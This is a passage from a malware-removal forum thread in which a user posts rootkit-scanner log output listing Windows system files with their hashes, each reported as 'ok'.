15:33:59.0188 0x04bc  C:\Windows\System32\VaultCredProvider.dll - ok
15:33:59.0190 0x04bc  [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] C:\Windows\System32\drivers\fltMgr.sys
15:33:59.0190 0x04bc  C:\Windows\System32\drivers\fltMgr.sys - ok
15:33:59.0192 0x04bc  [ A3DB3C17EE6CAE65D53602B4E80BCCBC, D802A7C6161F937DC42A6E45FE1BB2C8272819F92C294C180EBCDF8FF72CBFDC ] C:\Windows\System32\PSHED.DLL
15:33:59.0192 0x04bc  C:\Windows\System32\PSHED.DLL - ok
15:33:59.0194 0x04bc  [ 50544D04AD845C43130B70212EC05CCD, B2E6B558DE7D273512226685FF53ED17C9B4BF81B739FBCA5D3FC82DF8D2BCF7 ] C:\Windows\System32\microsoft-windows-kernel-power-events.dll
15:33:59.0194 0x04bc  C:\Windows\System32\microsoft-windows-kernel-power-events.dll - ok
15:33:59.0196 0x04bc  [ B0945E538CF906BBDDC5A11C8EE868CC, 5F3459F6512918835F7C9400905EC7C1FAEAA7114E0D28C522040C359E3B93F7 ] C:\Windows\System32\microsoft-windows-kernel-processor-power-events.dll
15:33:59.0196 0x04bc  C:\Windows\System32\microsoft-windows-kernel-processor-power-events.dll - ok
15:33:59.0198 0x04bc  [ BF352E73615F5461AA6884472435A544, 4B059E79325C5F08CD6FBBE6352E17ADB64B9608CC9EDB36A2DF4D148060C309 ] C:\Windows\System32\BioCredProv.dll
15:33:59.0198 0x04bc  C:\Windows\System32\BioCredProv.dll - ok
15:33:59.0199 0x04bc  [ 8563BA40DF4F1E93A61B70E2C8B60CF8, E5CAA520CBE61FAF3EAA784A51ED30E0CB2FD78EFD8AE1D5C6B0FE43A1009F39 ] C:\Windows\System32\SmartcardCredentialProvider.dll
15:33:59.0199 0x04bc  C:\Windows\System32\SmartcardCredentialProvider.dll - ok
15:33:59.0201 0x04bc  [ 796B8123A7859AFD3A4AE10514DBAEB5, E76F69FAFEC3D66263ED95F3FA9EE309BDDACB287E30583A147DC97F6EEB8844 ] C:\Windows\System32\winbio.dll
15:33:59.0201 0x04bc  C:\Windows\System32\winbio.dll - ok
15:33:59.0203 0x04bc  [ 4403D5ECE7D8323CAF1207D1AA38FA01, BD0B34DCF658D3CB91C1B55E9E730C5F7C571AFC2BFA09270C377B72B6830D48 ] C:\Windows\System32\credui.dll
15:33:59.0203 0x04bc  C:\Windows\System32\credui.dll - ok
15:33:59.0205 0x04bc  [ EEEA40F0EDB0A6E5359E539E15D0BC77, BFCBF777239C29C6AC4BC5B59591308571647B7C7FDB5571903F7403DD241E8E ] C:\Windows\System32\netapi32.dll
15:33:59.0205 0x04bc  C:\Windows\System32\netapi32.dll - ok
15:33:59.0207 0x04bc  [ 44B9C66177651F3F53C87B665D58D17A, 3FC426115FF87570889DB28D71970B82B525D2A4B9A00EDD273BF083B77A05CE ] C:\Windows\System32\vaultcli.dll
15:33:59.0207 0x04bc  C:\Windows\System32\vaultcli.dll - ok
15:33:59.0208 0x04bc  [ 3C91392D448F6E5D525A85B7550D8BA9, 6FD0DC73DBE7519E2C643554C2A7F8FBE4F9A678C4241BB54B3C6E65D2ABCF3A ] C:\Windows\System32\wkscli.dll
15:33:59.0208 0x04bc  C:\Windows\System32\wkscli.dll - ok
15:33:59.0210 0x04bc  [ 972C3301DB3DA91AE06A95F6B4160B1B, 678B533A06C306295FE97DC26CE9BAFFC8EAF1FB7405ACB040719099717744D5 ] C:\Windows\System32\certCredProvider.dll
15:33:59.0210 0x04bc  C:\Windows\System32\certCredProvider.dll - ok
15:33:59.0212 0x04bc  [ FC51229C7D4AFA0D6F186133728B95AB, 37E58C8E1C8437D1981725A5DCDACA7316CEFBB570370CEFC8D122F523B96AC0 ] C:\Windows\System32\samcli.dll
15:33:59.0212 0x04bc  C:\Windows\System32\samcli.dll - ok
15:33:59.0214 0x04bc  [ 87FA0C48C3B2E9FEE518818FE26B15B5, DA4042DE9897397AEDCEFF9F69746726237305DDE64464309B6DCC45E05E42F4 ] C:\Windows\System32\rasplap.dll
15:33:59.0214 0x04bc  C:\Windows\System32\rasplap.dll - ok
15:33:59.0216 0x04bc  [ 019CD868461B646E09BDF04474C19341, 01837EFACB02E52BC6E90C90C4CB01B11D56E449A37EA4FC2695507FF85EA9FE ] C:\Windows\System32\rasapi32.dll
15:33:59.0216 0x04bc  C:\Windows\System32\rasapi32.dll - ok
15:33:59.0218 0x04bc  [ B28DEEC597C8DEB70C744C7CF9210E3E, E777F192D822990CA6301B3FEA2AEA213FA7901438EB3328914ADF02B6C39DB9 ] C:\Windows\System32\rasman.dll
15:33:59.0218 0x04bc  C:\Windows\System32\rasman.dll - ok
15:33:59.0219 0x04bc  [ B53C4B69B695EDA1B7E41D35CA4244E2, 3D98E9B263CADA576E4057E059AFC867F6E3F1001F3B73C8BCF9066763A45D9D ] C:\Windows\System32\rtutils.dll
15:33:59.0219 0x04bc  C:\Windows\System32\rtutils.dll - ok
15:33:59.0221 0x04bc  [ 030B778F4272DF185E4E2E8EC49D162E, 702E884DC9C56D67A250F2DE4C293A878054F0F0A3BB64944A204445D9D5357F ] C:\Windows\System32\gpsvc.dll
15:33:59.0221 0x04bc  C:\Windows\System32\gpsvc.dll - ok
15:33:59.0223 0x04bc  [ 39170EE9D22ED3DAF45501ED19E145D6, 86B521E8A8FA113F6AB30AAC3C49C4255B2120EF10A553155E488E8CB0347DB3 ] C:\Windows\System32\nlaapi.dll
15:33:59.0223 0x04bc  C:\Windows\System32\nlaapi.dll - ok
15:33:59.0224 0x04bc  [ A77BE7CB3222B4FB0AC6C71D1C2698D4, 73566223914BF670DF6B5931FA213E546713531B10391ED65B5256BBD7ABDE7F ] C:\Windows\System32\dsrole.dll
15:33:59.0224 0x04bc  C:\Windows\System32\dsrole.dll - ok
15:33:59.0226 0x04bc  [ BAAFAF9CEAEC0B73C2A3550A01F6CECB, 018CB95A43CEA2063EA24691C71D51EF60D522C21502ABA8AD93876363D4B857 ] C:\Windows\System32\taskschd.dll
15:33:59.0226 0x04bc  C:\Windows\System32\taskschd.dll - ok
15:33:59.0228 0x04bc  [ 862596399AAFD2A21DB2AF9270CD4F70, 24CAA19EE791FB3440CE742C9064FCE0CB755EF0789D3CE62058A2CFEF0FF6D2 ] C:\Windows\System32\mstask.dll
15:33:59.0228 0x04bc  C:\Windows\System32\mstask.dll - ok
15:33:59.0229 0x04bc  [ BE097F5BB10F9079FCEB2DC4E7E20F02, 90A88986C8C5F30FB153EC803FEDA6572B2C2630A6C9578FCC017800692694D5 ] C:\Windows\System32\slc.dll
15:33:59.0229 0x04bc  C:\Windows\System32\slc.dll - ok
15:33:59.0231 0x04bc  [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] C:\Windows\System32\es.dll
15:33:59.0231 0x04bc  C:\Windows\System32\es.dll - ok
15:33:59.0233 0x04bc  [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] C:\Windows\System32\Sens.dll
15:33:59.0233 0x04bc  C:\Windows\System32\Sens.dll - ok
15:33:59.0235 0x04bc  [ 1A47D52E303B7543E4E6026595B95422, C577CD3837546A7CED5D2E8E97FA2EDACA133B4A8595770EF96CAE519BFE280F ] C:\Windows\System32\comres.dll
15:33:59.0235 0x04bc  C:\Windows\System32\comres.dll - ok
15:33:59.0236 0x04bc  [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] C:\Windows\System32\uxsms.dll
15:33:59.0236 0x04bc  C:\Windows\System32\uxsms.dll - ok
15:33:59.0238 0x04bc  [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] C:\Windows\System32\drivers\lltdio.sys
15:33:59.0238 0x04bc  C:\Windows\System32\drivers\lltdio.sys - ok
15:33:59.0240 0x04bc  [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] C:\Windows\System32\drivers\rspndr.sys
15:33:59.0240 0x04bc  C:\Windows\System32\drivers\rspndr.sys - ok
15:33:59.0242 0x04bc  [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] C:\Windows\System32\lmhsvc.dll
15:33:59.0242 0x04bc  C:\Windows\System32\lmhsvc.dll - ok
15:33:59.0244 0x04bc  [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] C:\Windows\System32\nsisvc.dll
15:33:59.0244 0x04bc  C:\Windows\System32\nsisvc.dll - ok
15:33:59.0245 0x04bc  [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] C:\Windows\System32\dnsrslvr.dll
15:33:59.0245 0x04bc  C:\Windows\System32\dnsrslvr.dll - ok
15:33:59.0247 0x04bc  [ 4C9210E8F4E052F6A4EB87716DA0C24C, 460F7990BDADB7D58D6DC95B094D30A2EFDC4CEED444B18A2F36E8D9076FB8B9 ] C:\Windows\System32\winnsi.dll
15:33:59.0247 0x04bc  C:\Windows\System32\winnsi.dll - ok
15:33:59.0249 0x04bc  [ 2B81776DA02017A37FE26C662827470E, A656353C50EE08422145D00DB9CFD9F6D3E664753B3C454B171E2A56A8AA94DC ] C:\Windows\System32\IPHLPAPI.DLL
15:33:59.0249 0x04bc  C:\Windows\System32\IPHLPAPI.DLL - ok
15:33:59.0251 0x04bc  [ B73A6E4B319AFFE64582AC5C1801BB3F, 274EEA0743DC659180E691654CBB17136E9E9D83B07E302B47EA5B103EA57710 ] C:\Windows\System32\nrpsrv.dll
15:33:59.0251 0x04bc  C:\Windows\System32\nrpsrv.dll - ok
15:33:59.0253 0x04bc  [ 6D7E8A022DB7DAD500789CBA5C2EF005, FBD3710CDD3690A104486E36FB5A85CFF07D350B99C8302272702D4019E09FC0 ] C:\Windows\System32\dhcpcore.dll
15:33:59.0253 0x04bc  C:\Windows\System32\dhcpcore.dll - ok
15:33:59.0254 0x04bc  [ 195114597C4CF17F28CD808E9A3222FF, 448EDCA94E5382BD36D64DA92DC5C6858CD0DAA6D0CFD62013ACE05FBBC8D715 ] C:\Windows\System32\dhcpcore6.dll
15:33:59.0254 0x04bc  C:\Windows\System32\dhcpcore6.dll - ok
15:33:59.0256 0x04bc  [ DB702C2833EC2AA7DC981FD1E44F145A, EEA9F30D0FD5A0394155577CF3FD1F74B1C3E19A823F978FD5F87D8F9ED0C608 ] C:\Windows\System32\FWPUCLNT.DLL
15:33:59.0256 0x04bc  C:\Windows\System32\FWPUCLNT.DLL - ok
15:33:59.0258 0x04bc  [ 885D0942E0F28DB90919BE3129ECF279, 5A10D90EE656ECE3DCA174D6F924641509819FC20CB6EF46B5E1723E52DE85BE ] C:\Windows\System32\dnsext.dll
15:33:59.0258 0x04bc  C:\Windows\System32\dnsext.dll - ok
15:33:59.0260 0x04bc  [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] C:\Windows\System32\shsvcs.dll
15:33:59.0260 0x04bc  C:\Windows\System32\shsvcs.dll - ok
15:33:59.0261 0x04bc  [ 5B3EBFC3DA142324B388DDCC4465E1FF, 5D58642305311F9BC9B779C9598BFC4E7433B3EA58404BF1FF9466838A2328C7 ] C:\Windows\System32\samlib.dll
15:33:59.0262 0x04bc  C:\Windows\System32\samlib.dll - ok
15:33:59.0263 0x04bc  [ 8D063B07B22324732EAF9C14D5594387, AAC98F3BF3D49ABB69EFC43BC458B3EFE937D31EC109D95F3830E26A8C97CCD7 ] C:\Windows\System32\dhcpcsvc6.dll
15:33:59.0263 0x04bc  C:\Windows\System32\dhcpcsvc6.dll - ok
15:33:59.0265 0x04bc  [ F568F7C08458D69E4FCD8675BBB107E4, A5FA25ECF248999A68CCECFBB508BFA1ADD18A23E20A9A9081A87C41CAAA36C0 ] C:\Windows\System32\dhcpcsvc.dll
15:33:59.0265 0x04bc  C:\Windows\System32\dhcpcsvc.dll - ok
15:33:59.0267 0x04bc  [ 262F6592C3299C005FD6BEC90FC4463A, 54095E37F0B6CC677A3E9BDD40F4647C713273D197DB341063AA7F342A60C4A7 ] C:\Windows\System32\schedsvc.dll
15:33:59.0267 0x04bc  C:\Windows\System32\schedsvc.dll - ok
15:33:59.0269 0x04bc  [ BC414631876B2F28B8DAB08E849C12C5, 5973654AA3E90E6B699B0A43F645B893D95BAA803129B6967D746C8239AB26E3 ] C:\Windows\System32\ktmw32.dll
15:33:59.0269 0x04bc  C:\Windows\System32\ktmw32.dll - ok
15:33:59.0271 0x04bc  [ 945E54F23C72D37B8CD1987AF0DB63BF, C2B217C94DBCA0A31ED834B9D492B53B25B235DDD02B1D1200E76609D32772EA ] C:\Windows\System32\fveapi.dll
15:33:59.0271 0x04bc  C:\Windows\System32\fveapi.dll - ok
15:33:59.0272 0x04bc  [ 891ECFD08E2C538B7948CBC45106D697, 628D0D618FF3A70E9FBE3B2C7206C9365ED2297784A5F10FFA05BD2C56657013 ] C:\Windows\System32\fvecerts.dll
15:33:59.0272 0x04bc  C:\Windows\System32\fvecerts.dll - ok
15:33:59.0274 0x04bc  [ 6DC4A7242F565C9E9C9CCC7BB0FA75C7, 4BC5A1279885EEFBEB27333AF719622A5FCDD9606697692C1978E434CE264D80 ] C:\Windows\System32\taskcomp.dll
15:33:59.0274 0x04bc  C:\Windows\System32\taskcomp.dll - ok
15:33:59.0276 0x04bc  [ 694865362F0965779F92BCFE97712323, 825EB75E37AFE9B738869FB5D95020D4F44AD419C2F6C5A658F82A5242FDEF6C ] C:\Windows\System32\tbs.dll
15:33:59.0276 0x04bc  C:\Windows\System32\tbs.dll - ok
15:33:59.0278 0x04bc  [ 8269210DAF3B12BC8300631B28A2A442, EABEB792C2EA8D4A1A7B13281CF557C194D5667AE0BA2A2D5664908D8269113D ] C:\Windows\System32\wiarpc.dll
15:33:59.0278 0x04bc  C:\Windows\System32\wiarpc.dll - ok
15:33:59.0280 0x04bc  [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] C:\Windows\System32\drivers\http.sys
15:33:59.0280 0x04bc  C:\Windows\System32\drivers\http.sys - ok
15:33:59.0281 0x04bc  [ B98780FA7839BB6B14823C56A7BDA35C, 7EF79A807DE9940A93BDE9E18CD83940773BCA26CA68646C76BC2F96B6DC2E5B ] C:\Windows\System32\spoolsv.exe
15:33:59.0281 0x04bc  C:\Windows\System32\spoolsv.exe - ok
15:33:59.0283 0x04bc  [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] C:\Windows\System32\SCardSvr.dll
15:33:59.0283 0x04bc  C:\Windows\System32\SCardSvr.dll - ok
15:33:59.0285 0x04bc  [ F513F0CE75F873A0050A34379A8E76B5, CB1329CCAE7B8EBB711772F4A4C5ABBC47347C948BBBDEE011A8A25872B0C17D ] C:\Windows\System32\BFE.DLL
15:33:59.0285 0x04bc  C:\Windows\System32\BFE.DLL - ok
15:33:59.0287 0x04bc  [ 6C02A83164F5CC0A262F4199F0871CF5, AD4632A6A203CB40970D848315D8ADB9C898349E20D8DF4107C2AE2703A2CF28 ] C:\Windows\System32\drivers\bowser.sys
15:33:59.0287 0x04bc  C:\Windows\System32\drivers\bowser.sys - ok
15:33:59.0289 0x04bc  [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] C:\Windows\System32\drivers\mpsdrv.sys
15:33:59.0289 0x04bc  C:\Windows\System32\drivers\mpsdrv.sys - ok
15:33:59.0291 0x04bc  [ 069B85494CDBC587A4A60AD75A13CC5D, C708F6E30707B3DA162CB2E41BF24A9ACF7D95E858D623802C0E29C9A9C7FB32 ] C:\Windows\System32\drivers\mrxsmb.sys
15:33:59.0291 0x04bc  C:\Windows\System32\drivers\mrxsmb.sys - ok
15:33:59.0291 0x04bc  [ EF2AE43BCD46ABB13FC3E5B2B1935C73, 81FC06F306F620845D7DD8D06E706309E70BC89B589C81F3478302A3F5F73431 ] C:\Windows\System32\winmm.dll
15:33:59.0291 0x04bc  C:\Windows\System32\winmm.dll - ok
15:33:59.0293 0x04bc  [ 7D5645EE0EA77D539828433D9B95F5EB, EEF81E9B2205FC456DB6095AD0AEAB38BB131D3BCD090EA6CD91D5568ACAFB7F ] C:\Windows\System32\WinSCard.dll
15:33:59.0293 0x04bc  C:\Windows\System32\WinSCard.dll - ok
15:33:59.0295 0x04bc  [ C67F8A962B2534224D5908D16D2AD3CE, CAC1821F5E867285638AEE7AE33CE574BCCF16277AC5AD805650B48F7759B4B4 ] C:\Windows\System32\wfapigp.dll
15:33:59.0295 0x04bc  C:\Windows\System32\wfapigp.dll - ok
15:33:59.0297 0x04bc  [ 8560FFFC8EB3A806DCD4F82252CFC8C6, CC27BC092369A89D6147B16568FEDEB68B584D5738CD686C31F7FAE22ED17B3B ] C:\Windows\System32\ksuser.dll
15:33:59.0297 0x04bc  C:\Windows\System32\ksuser.dll - ok
15:33:59.0298 0x04bc  [ 1473768973453DE50DC738C2955FC4DD, 14BC5DA2442CB726ACC1F277DDBECCF5D61E3A0A3E083A55A0BB610191E35220 ] C:\Windows\System32\wdmaud.drv
15:33:59.0298 0x04bc  C:\Windows\System32\wdmaud.drv - ok
15:33:59.0300 0x04bc  [ CF636C92B762B26F0B39B38E92380A09, F7B8B0EA4536CE3BA33EE1BD0783F6AAD8C0EF69714E874D4A30B720A04C7A18 ] C:\Windows\System32\oleacc.dll
15:33:59.0300 0x04bc  C:\Windows\System32\oleacc.dll - ok
15:33:59.0302 0x04bc  [ 019BDD35DE269CB98B22DE8923C2AA3B, 68B216D5331B128CF1BCB3A3F82FD85B119FFDBCB796C907461CDD6248995817 ] C:\Windows\System32\UIAutomationCore.dll
15:33:59.0302 0x04bc  C:\Windows\System32\UIAutomationCore.dll - ok
15:33:59.0304 0x04bc  [ DC220AE6F64819099F7EBD6F137E32E7, B8FE13B859FA83500DD95637FA6D4A5B8392C2A363E41D014D3B5374F636E1DE ] C:\Windows\System32\AudioSes.dll
15:33:59.0304 0x04bc  C:\Windows\System32\AudioSes.dll - ok
15:33:59.0306 0x04bc  [ 10AC5CE9F78DC281A1BBD9B8CC587B8A, 72288C0A88916D3C3828DBD948DBDB0928F26106319F8E60102D6C9004514D60 ] C:\Windows\System32\msacm32.dll
15:33:59.0306 0x04bc  C:\Windows\System32\msacm32.dll - ok
15:33:59.0307 0x04bc  [ 1B7C3A37362C7B2890168C5FC61C8D9B, 03727930E5BB5F9D91BAB901FC9A2E3B795D68E2AEE6A2CC3477F356C45A9C54 ] C:\Windows\System32\msacm32.drv
15:33:59.0307 0x04bc  C:\Windows\System32\msacm32.drv - ok
15:33:59.0309 0x04bc  [ 5EDBB34736DD7AC1A73CF8792A835E10, 15E87C449AAF2095273341DD9355D8DF2690340D1DEFAF0DFF034F1CDF4316F8 ] C:\Windows\System32\AudioEng.dll
15:33:59.0309 0x04bc  C:\Windows\System32\AudioEng.dll - ok
15:33:59.0311 0x04bc  [ CA2A0750ED830678997695FF61B04C30, E84860CD97AA3C4565ABB2D5D406A5C42B1AD2D8BA1B8CF81FE564D91F15F976 ] C:\Windows\System32\midimap.dll
15:33:59.0311 0x04bc  C:\Windows\System32\midimap.dll - ok
15:33:59.0313 0x04bc  [ C1395286B822E306B4FE1568A8A77813, 0642B6C793BE0EED5E7D1D2533FC5A01417C50040FC60A8E89BD97CE4A119388 ] C:\Windows\System32\AUDIOKSE.dll
15:33:59.0313 0x04bc  C:\Windows\System32\AUDIOKSE.dll - ok
15:33:59.0315 0x04bc  [ B7A9F792C05D2E350112675A91C49805, 01DA8F6AB67BB0795631F6B914048DE554C3ECA60E77A99C2D26653361407BAE ] C:\Windows\System32\RtkAPO64.dll
15:33:59.0315 0x04bc  C:\Windows\System32\RtkAPO64.dll - ok
15:33:59.0317 0x04bc  [ 6F3C559B82F2912354BE5B098744CC8C, EB64E5C02C81588921A65194E1256E80699A1317E7D9A57395CD38C2639C8B08 ] C:\Windows\System32\WMALFXGFXDSP.dll
15:33:59.0317 0x04bc  C:\Windows\System32\WMALFXGFXDSP.dll - ok
15:33:59.0318 0x04bc  [ 54B5DCD55B223BC5DF50B82E1E9E86B1, 025294DD69A421FE4EACAA463F8CB797610D8F3A7A3C61656AE83D0CEE07A9BF ] C:\Windows\System32\mfplat.dll
15:33:59.0318 0x04bc  C:\Windows\System32\mfplat.dll - ok
15:33:59.0320 0x04bc  [ 38CC780346941F41829C42FA73E19B54, E713C2937D7E0FAC520AFB32F4C1257067DE0290875FEB2E5E567ACBEA687CA1 ] C:\Windows\System32\drivers\mrxsmb10.sys
15:33:59.0320 0x04bc  C:\Windows\System32\drivers\mrxsmb10.sys - ok
15:33:59.0322 0x04bc  [ 72978589D92E2F80C89C7E9F88F206CA, 4C62AAA8225672AEF2EBF066459B992D85F6C0537EDFF7D23E8F4F3E9D896CAB ] C:\Windows\System32\drivers\mrxsmb20.sys
15:33:59.0322 0x04bc  C:\Windows\System32\drivers\mrxsmb20.sys - ok
15:33:59.0324 0x04bc  [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] C:\Windows\System32\wkssvc.dll
15:33:59.0324 0x04bc  C:\Windows\System32\wkssvc.dll - ok



#12 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:03:41 PM

Posted 06 November 2014 - 03:52 PM

15:33:59.0326 0x04bc  [ F9D908DE6B166DAC9B89BF62FA291CE8, D0A918AD60221623BB0278EA94CD6938744617FDBB2054968AFAFC2940648F02 ] C:\Program Files\Bonjour\mdnsNSP.dll
15:33:59.0326 0x04bc  C:\Program Files\Bonjour\mdnsNSP.dll - ok
15:33:59.0328 0x04bc  [ 88351B29B622B30962D2FEB6CA8D860B, A16CAD7D94C1C9807083BB36E9B4C3C14E6482C4CA2BDFACBCC86E737DDCE42E ] C:\Windows\System32\rasadhlp.dll
15:33:59.0328 0x04bc  C:\Windows\System32\rasadhlp.dll - ok
15:33:59.0329 0x04bc  [ 843E337C1CDD282545ED7515345E263B, B0E485856FC1C28DA6C453BF60A04F603BA15D7B0D84896E878049198F2FD1C9 ] C:\Windows\System32\nlasvc.dll
15:33:59.0330 0x04bc  C:\Windows\System32\nlasvc.dll - ok
15:33:59.0331 0x04bc  [ C5679E5186B2FC95BC76A8A9870D5456, 70AC61850B811A0A902532F098AE1D5DF4622455E56C78B89D4ABDBE4A061A48 ] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
15:33:59.0332 0x04bc  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe - ok
15:33:59.0334 0x04bc  [ FAC488937BCB8FBD6FCEB7E17B5D1383, BDA339B767FF86233AFEAE9084A56DEE52FB4B3FCFD200316255F6B6317E7008 ] C:\Windows\SysWOW64\ntdll.dll
15:33:59.0334 0x04bc  C:\Windows\SysWOW64\ntdll.dll - ok
15:33:59.0335 0x04bc  [ 2A107B611C91CD256466C58C0D776E9D, 58EA4F6E0FE7EFB8D3024AE71EE16848C2A00BA5224C8054C80134F99D9A72AB ] C:\Windows\System32\wow64.dll
15:33:59.0335 0x04bc  C:\Windows\System32\wow64.dll - ok
15:33:59.0337 0x04bc  [ 7434E01FBCA3CB86539C39412A31D5E1, E40D5AEBB3A5D8F53C76E3FBF0C07B9C0227914C869F57622EA44A212383EE6D ] C:\Windows\System32\wow64win.dll
15:33:59.0337 0x04bc  C:\Windows\System32\wow64win.dll - ok
15:33:59.0339 0x04bc  [ 1834B31C749B86DAC233BBBA1C03BC48, 27FCA9196842C0BB53CCAD895870A0EB10D2F8ED67E5486A4437067BD4BC4448 ] C:\Windows\System32\mscms.dll
15:33:59.0339 0x04bc  C:\Windows\System32\mscms.dll - ok
15:33:59.0341 0x04bc  [ 58A0CDABEA255616827B1C22C9994466, 4FE1140AA8D3995579DE8CDF4ECAD1978804D05351EABB4079A63B303EF1B451 ] C:\Windows\System32\NapiNSP.dll
15:33:59.0341 0x04bc  C:\Windows\System32\NapiNSP.dll - ok
15:33:59.0343 0x04bc  [ EE26D130808D16C0E417BBBED0451B34, 4886DCE4FAEF146A40BABD492A8000A2022FEA542A6135A9BAFD4CD09297B4E5 ] C:\Windows\System32\ntdsapi.dll
15:33:59.0343 0x04bc  C:\Windows\System32\ntdsapi.dll - ok
15:33:59.0345 0x04bc  [ 613C8CE10A5FDE582BA5FA64C4D56AAA, 30507B6BA79E1A271B07BBA58B4FF463678BE0960266A1D5E88031E932D768B6 ] C:\Windows\System32\pnrpnsp.dll
15:33:59.0345 0x04bc  C:\Windows\System32\pnrpnsp.dll - ok
15:33:59.0346 0x04bc  [ 2E2072EB48238FCA8FBB7A9F5FABAC45, AC70B9FC24847EEC2E18008F2894DCDAC19A9C90D5D88729326E493CA524F5C3 ] C:\Windows\System32\winrnr.dll
15:33:59.0347 0x04bc  C:\Windows\System32\winrnr.dll - ok
15:33:59.0348 0x04bc  [ 3AEAA8B561E63452C655DC0584922257, 04C072969B58657602EB0C21CEDF24FCEE14E61B90A0F758F93925EF2C9FC32D ] C:\Windows\System32\pcasvc.dll
15:33:59.0348 0x04bc  C:\Windows\System32\pcasvc.dll - ok
15:33:59.0350 0x04bc  [ 748849C42DEA24C723048E24BCA1BD55, 517DDE70E7CB8E94C6E8B9B05CCD4BC6490A8837FD8BB874C9E1186D8EF07659 ] C:\Windows\System32\wshbth.dll
15:33:59.0350 0x04bc  C:\Windows\System32\wshbth.dll - ok
15:33:59.0352 0x04bc  [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] C:\Windows\System32\snmptrap.exe
15:33:59.0352 0x04bc  C:\Windows\System32\snmptrap.exe - ok
15:33:59.0354 0x04bc  [ 0F090A77E664CB0F70AB8D3B230B760C, A08EA0409B3BF88AB12792F721FA3A692BBE640DF2A06641E142843A7044EC5E ] C:\Windows\System32\wow64cpu.dll
15:33:59.0354 0x04bc  C:\Windows\System32\wow64cpu.dll - ok
15:33:59.0355 0x04bc  [ 76161B9D78A275F8F28DD67436013110, E4AE9648BDED9035D39DF20C3A6F453F67D49D7899038B21D88FFD4EFFCC4C08 ] C:\Windows\SysWOW64\kernel32.dll
15:33:59.0355 0x04bc  C:\Windows\SysWOW64\kernel32.dll - ok
15:33:59.0357 0x04bc  [ 4004299B7AF4CBFF6540F1798899A11F, 5DD3AE149B7228A769F2FE95355795AC98ACD8CDFB78954A423A357F717203C3 ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelEvents.dll
15:33:59.0357 0x04bc  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelEvents.dll - ok
15:33:59.0359 0x04bc  [ 461B713DE7F353C6447B744F1A049930, 3551C57128DAFA009C9DB3EE0D798D94B269D1605F74897566D7E79E5FDD437B ] C:\Windows\SysWOW64\KernelBase.dll
15:33:59.0359 0x04bc  C:\Windows\SysWOW64\KernelBase.dll - ok
15:33:59.0361 0x04bc  [ 91A8E32B00BF7899EDAB6783287DDDA6, 49451722317AB42B3DE407EFCB9CC560C1455217AC3E2F11F74D08C1708473C5 ] C:\Windows\System32\PeerDistSh.dll
15:33:59.0361 0x04bc  C:\Windows\System32\PeerDistSh.dll - ok
15:33:59.0363 0x04bc  [ 387728CB482C94EAA0BE78F6456AE6CA, A8846E2CBAF051927ED457D996FEE3CA5EFFCF9F2F9EA29DAED8908B849F93D4 ] C:\Windows\SysWOW64\sysfer.dll
15:33:59.0363 0x04bc  C:\Windows\SysWOW64\sysfer.dll - ok
15:33:59.0365 0x04bc  [ 5E0DB2D8B2750543CD2EBB9EA8E6CDD3, 01EB95FA3943CF3C6B1A21E473A5C3CB9FCBCE46913B15C96CAC14E4F04075B4 ] C:\Windows\SysWOW64\user32.dll
15:33:59.0365 0x04bc  C:\Windows\SysWOW64\user32.dll - ok
15:33:59.0367 0x04bc  [ 56E3313690866F99CD17AA1342F64AE1, 4AD4E105C1A6E9BAB9568CA21B15A38C59702EF605AA9058490C56DA070CF846 ] C:\Windows\SysWOW64\gdi32.dll
15:33:59.0367 0x04bc  C:\Windows\SysWOW64\gdi32.dll - ok
15:33:59.0369 0x04bc  [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] C:\Windows\System32\sstpsvc.dll
15:33:59.0369 0x04bc  C:\Windows\System32\sstpsvc.dll - ok
15:33:59.0370 0x04bc  [ CC23295DA8F7B5C53F93804D2F5D30EB, B290D96C40FBA934DE6CFF82D9BBA6780922CC5012C61599BD5006DAEDC82DDB ] C:\Windows\SysWOW64\lpk.dll
15:33:59.0370 0x04bc  C:\Windows\SysWOW64\lpk.dll - ok
15:33:59.0372 0x04bc  [ A5F833506BF6A1B5D693E1499DEE2444, 045874B7D37F49216E37D551076FF440E29DB5196564E714207DF753DF7FDDEE ] C:\Windows\SysWOW64\usp10.dll
